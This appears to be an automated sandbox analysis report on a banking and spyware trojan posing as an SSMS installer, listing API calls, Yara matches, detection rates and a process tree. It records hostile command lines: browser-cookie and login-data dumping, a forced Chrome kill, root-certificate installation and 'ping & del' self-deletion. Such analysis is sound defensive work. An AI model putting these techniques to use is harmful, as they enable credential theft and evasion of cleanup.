Source: ecv953D.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 83C12B0D0FA88B10.exe, 83C12B0D0FA88B10.exe, 00000004.00000003.270705708.0000000003F1A000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.266586858.0000000003F38000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: ecv953D.tmp.9.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecv953D.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.266586858.0000000003F38000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
Source: ecv953D.tmp.9.drString found in binary or memory: https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:aut
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecv953D.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: ecv953D.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecv953D.tmp.9.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecv953D.tmp.9.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecv953D.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: 83C12B0D0FA88B10.exeString found in binary or memory: https://mail.google.com/mail
Source: 83C12B0D0FA88B10.exeString found in binary or memory: https://mail.google.com/mail/#settings
Source: C:\Users\user\AppData\Roaming\1615173766196.exe Code function: 9_2_0040AE4D OpenClipboard

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Users\user\Desktop\IpB8f8qwze.exe Code function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext

System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.2.83C12B0D0FA88B10.exe.3200000.7.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.83C12B0D0FA88B10.exe.3300000.8.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: IpB8f8qwze.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 83C12B0D0FA88B10.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IpB8f8qwze.exe Code function: 0_2_1001A000 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess
Source: C:\Users\user\Desktop\IpB8f8qwze.exe Code function: 0_2_10019DA0 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\Desktop\IpB8f8qwze.exe Code function: 0_2_10019F60 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess
Source: C:\Users\user\Desktop\IpB8f8qwze.exe Code function: 0_2_10019FB0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\1615173766196.exe Code function: 9_2_0040C516 NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\1615173766196.exe Code function: 9_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary
Source: C:\Users\user\Desktop\IpB8f8qwze.exe Code function: 0_2_1001D840: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle
Source: IpB8f8qwze.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 83C12B0D0FA88B10.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1615173766196.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IpB8f8qwze.exe, 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.P&OriginalFilenameSSMS-Setup-ENU.exe vs IpB8f8qwze.exe
Source: IpB8f8qwze.exe, 00000000.00000002.258243387.0000000000B00000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs IpB8f8qwze.exe
Source: IpB8f8qwze.exe, 00000000.00000002.258239090.0000000000AF0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs IpB8f8qwze.exe
Source: IpB8f8qwze.exe, 00000000.00000002.258255558.0000000000B20000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs IpB8f8qwze.exe
Source: IpB8f8qwze.exe Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.P&OriginalFilenameSSMS-Setup-ENU.exe vs IpB8f8qwze.exe
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: IpB8f8qwze.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000002.00000002.310468368.0000000002720000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.258774447.00000000027B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.275254387.0000000002650000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.83C12B0D0FA88B10.exe.2650000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.IpB8f8qwze.exe.10000000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.83C12B0D0FA88B10.exe.2720000.3.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.IpB8f8qwze.exe.27b0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.83C12B0D0FA88B10.exe.2650000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.83C12B0D0FA88B10.exe.2720000.3.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.IpB8f8qwze.exe.27b0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.83C12B0D0FA88B10.exe.10000000.12.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.83C12B0D0FA88B10.exe.3200000.7.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 2.2.83C12B0D0FA88B10.exe.10000000.12.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.83C12B0D0FA88B10.exe.3300000.8.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal90.bank.troj.spyw.evad.winEXE@32/37@33/4
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00433DA8 FormatMessageW,GetLastError,LocalFree,0_2_00433DA8
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004011BF GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,GetLastError,CloseHandle,0_2_004011BF
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,9_2_0040CE93
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004358BF GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_004358BF
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,9_2_0040D9FC
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0041DA76 ChangeServiceConfigW,GetLastError,0_2_0041DA76
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Login Data1615173735593
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\IpB8f8qwze.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
Source: IpB8f8qwze.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1615173766196.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\IpB8f8qwze.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: IpB8f8qwze.exeVirustotal: Detection: 46%
Source: IpB8f8qwze.exeMetadefender: Detection: 16%
Source: IpB8f8qwze.exeReversingLabs: Detection: 37%
Source: IpB8f8qwze.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: IpB8f8qwze.exeString found in binary or memory: Cburn.runonceWixBundleLayoutDirectoryFailed to initialize engine state.Failed to initialize COM.Failed to initialize Regutil.Failed to initialize Wiutil.Failed to initialize XML util.engine.cppFailed to get OS info.3.8.1128.0Failed to initialize core.Failed to run per-user mode.Failed to run per-machine mode.Failed to run embedded mode.Failed to run RunOnce mode.Invalid run mode.txt_FailedSetupFailed to initialize engine section.Failed to open log.Failed to initialize internal cache functionality.Failed to create pipes to connect to elevated parent process.Failed to connect to elevated parent process.Failed to check global conditionsFailed to create the message window.Failed to query registration.Failed to set action variables.Failed to set registration variables.Failed to set layout directory variable to value provided from command-line.Failed while running Failed to create implicit elevated connection name and secret.Failed to launch unelevated process.Failed to connect to unelevated process.Failed to allocate thread local storage for logging.Failed to set elevated pipe into thread local storage for logging.Failed to pump messages from parent process.Failed to connect to parent of embedded process.Failed to run bootstrapper application embedded.Failed to get command line.Failed to get current process path.Failed to re-launch bundle process after RunOnce: %lsFailed to create engine for UX.Failed to load UX.Failed to start bootstrapper application.Unexpected return value from message pump.Failed to get process token.SeShutdownPrivilegeFailed to get shutdown privilege LUID.Failed to adjust token to add shutdown privileges.Failed to schedule restart.
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile read: C:\Users\user\Desktop\IpB8f8qwze.exe
Source: unknownProcess created: C:\Users\user\Desktop\IpB8f8qwze.exe 'C:\Users\user\Desktop\IpB8f8qwze.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 0011 user01
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0E9F5C63C593DB0A234ED10779F63A5A C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 200 user01
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\IpB8f8qwze.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1615173766196.exe 'C:\Users\user\AppData\Roaming\1615173766196.exe' /sjson 'C:\Users\user\AppData\Roaming\1615173766196.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 0011 user01
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 200 user01
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\IpB8f8qwze.exe'
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Users\user\AppData\Roaming\1615173766196.exe 'C:\Users\user\AppData\Roaming\1615173766196.exe' /sjson 'C:\Users\user\AppData\Roaming\1615173766196.txt'
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: IpB8f8qwze.exeStatic file information: File size 4882440 > 1048576
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IpB8f8qwze.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\src\wix38\build\ship\x86\burn.pdb source: IpB8f8qwze.exe
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1615173766196.exe, 00000009.00000000.261008599.000000000040F000.00000002.00020000.sdmp, 1615173766196.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
